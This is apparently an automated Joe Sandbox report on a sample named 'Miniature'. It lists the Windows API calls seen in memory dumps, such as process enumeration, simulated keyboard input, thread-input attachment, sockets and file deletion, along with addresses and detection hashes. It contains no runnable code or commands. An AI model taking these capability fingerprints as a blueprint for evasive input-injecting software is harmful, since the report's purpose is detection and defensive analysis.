• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                                                            • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CA6360
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CA638D
                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32(?), ref: 00CA639C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CB0BD4,?), ref: 00C70EE0
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CB0BD4,?), ref: 00C70EF8
                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00CADCE0,000000FF,?,00000000,00000800,00000000,?,00CB0BD4,?), ref: 00C70F1D
                                                                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00C70F3E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 314563124-0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00C9B10C
• Process32FirstW.KERNEL32(00000000,?), ref: 00C9B11A
  • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
• Process32NextW.KERNEL32(00000000,?), ref: 00C9B1FC
• CloseHandle.KERNEL32(00000000), ref: 00C9B20B
  • Part of subcall function 00C2E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C54D73,?), ref: 00C2E395
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00C9255A
• WSAGetLastError.WSOCK32 ref: 00C92568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C925E7
• WSAGetLastError.WSOCK32 ref: 00C925F1
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
APIs
• GetWindowRect.USER32(?,?), ref: 00CA6D1A
• ScreenToClient.USER32(?,?), ref: 00CA6D4D
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CA6DBA
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C861C8
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C861EE
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C86213
                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C8623F
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C7B473
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 00C7B48F
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C7B4FD
                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C7B54F
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00C7B5B8
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C7B5D4
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C7B63B
                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00C7B68D
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00CA80D4
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00CA814A
                                                                                                                                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00CA815A
                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00CA81C6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00CA2187
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C743AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetCurrentThreadId.KERNEL32 ref: 00C743B4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C72F00), ref: 00C743BB
                                                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 00CA219B
                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00CA21E8
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00CA21EE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7E8E2
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7E8F9
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7E924
                                                                                                                                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C7E92F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00CA9A5D
                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CA9A72
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00CA9ABA
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00CA9AF0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00CADC30), ref: 00C7DBA6
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C7DBB5
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C7DBC4
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CADC30), ref: 00C7DC21
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 21f48f17f659602a42cf6e4e945dd08aab90d37f96f2c3c2ac24e35a6cd8825e
                                                                                                                                                                                                                                                                                            • Instruction ID: 420338de664d5a94537ce7dfbd02ff405fddc296fda88bd6a8b87d130cab5862
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21f48f17f659602a42cf6e4e945dd08aab90d37f96f2c3c2ac24e35a6cd8825e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E2171705042059F8700DF24C98199ABBF8FE5A368F108A59F4AB872A1D731DE46DB52
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00CA32A6
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA32C0
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA32CE
                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CA32DC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2b778422c85cb50f990c7bb5118e66907254821a904e427ca324425e5d0d5456
                                                                                                                                                                                                                                                                                            • Instruction ID: 661c0329e1c6816d2bc5aea1715e7997e490ec520c148ae34d32b28729ff07b0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b778422c85cb50f990c7bb5118e66907254821a904e427ca324425e5d0d5456
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B721C431604552AFD7149F24C855FAA7B95EF86318F248258F8278B6D2C771EE81C7D0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C796E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C78271,?,000000FF,?,00C790BB,00000000,?,0000001C,?,?), ref: 00C796F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C796E4: lstrcpyW.KERNEL32(00000000,?,?,00C78271,?,000000FF,?,00C790BB,00000000,?,0000001C,?,?,00000000), ref: 00C79719
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C796E4: lstrcmpiW.KERNEL32(00000000,?,00C78271,?,000000FF,?,00C790BB,00000000,?,0000001C,?,?), ref: 00C7974A
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C790BB,00000000,?,0000001C,?,?,00000000), ref: 00C7828A
                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00C790BB,00000000,?,0000001C,?,?,00000000), ref: 00C782B0
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C790BB,00000000,?,0000001C,?,?,00000000), ref: 00C782EB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                            • Opcode ID: 406292eb84f1bfdd0f488b647620fd90f6c7a4b07ce02633600475b43656e843
                                                                                                                                                                                                                                                                                            • Instruction ID: 2750745e049dd77c74c58dfa525b9345e478670df30df8bc7405ca3575e0ba7c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 406292eb84f1bfdd0f488b647620fd90f6c7a4b07ce02633600475b43656e843
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0311E63A200741ABCB149F38D849E7E77A9FF45754B50812AFA47C72A0EF31D911D7A0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 00CA615A
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA616C
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA6177
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA62B5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 70c4a12f15d86efc46583052a00d326c14c82317a80a57ea84827fc807fe3076
                                                                                                                                                                                                                                                                                            • Instruction ID: 6c9173d550f2192201b03844d5791717e2e7f2cf52f88c8acbf9651ae2510183
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70c4a12f15d86efc46583052a00d326c14c82317a80a57ea84827fc807fe3076
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0111D67550021A9ADF20DFA59C85BEF7BBCEF13368F14412AFA21D6081EB70CA41DB60
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 47907bc0e0af8d0f61e15ff1c791e9daf8e6033f28b12001cc048ddd85804312
                                                                                                                                                                                                                                                                                            • Instruction ID: 87b1b1eaebac8d1053ea9698ce831b9ed46a84ab1f36bbb0d927ff27180e8b36
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47907bc0e0af8d0f61e15ff1c791e9daf8e6033f28b12001cc048ddd85804312
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB0186B26052167EF63126786CC2F6B678DFF413B8B754725F532A11D5DE708D40D160
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C72394
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C723A6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C723BC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C723D7
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a2efda72873a8d5b65cbb40fb6769fd130e74c0db574964e5e977b86d7c51fb7
                                                                                                                                                                                                                                                                                            • Instruction ID: b94a8fd6e3219f9353f75889c9b03cc7ec009c3287d5c7e75ba260b5352d041f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2efda72873a8d5b65cbb40fb6769fd130e74c0db574964e5e977b86d7c51fb7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D11393AD00218FFEB119BA5CD85F9DBB78FB08750F204091EA15B7290D6716F10DB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C11AF4
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C531F9
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C53203
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C5320E
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 769258816b5673da684fceb369fe1b19af217d2dd04b3ca6ea679a5d5d58b438
                                                                                                                                                                                                                                                                                            • Instruction ID: 00ca555c24e1f98da7600d3303a641a3c7fc8ddf798a375287b65aba22047e86
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 769258816b5673da684fceb369fe1b19af217d2dd04b3ca6ea679a5d5d58b438
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D113A75A0105AABCB10DFA4C985AEE7BB8EF06345F100452FA12E7140C774BA91EBA5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C7EB14
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00C7EB47
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C7EB5D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C7EB64
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9202d344fbd00a208ef179e62830a1de2380e84487a3a96dcf09863fbc6e2b05
                                                                                                                                                                                                                                                                                            • Instruction ID: 69dfcc2873e3259102089c501dd69996be921f04529c60f1972e5a13ecdea783
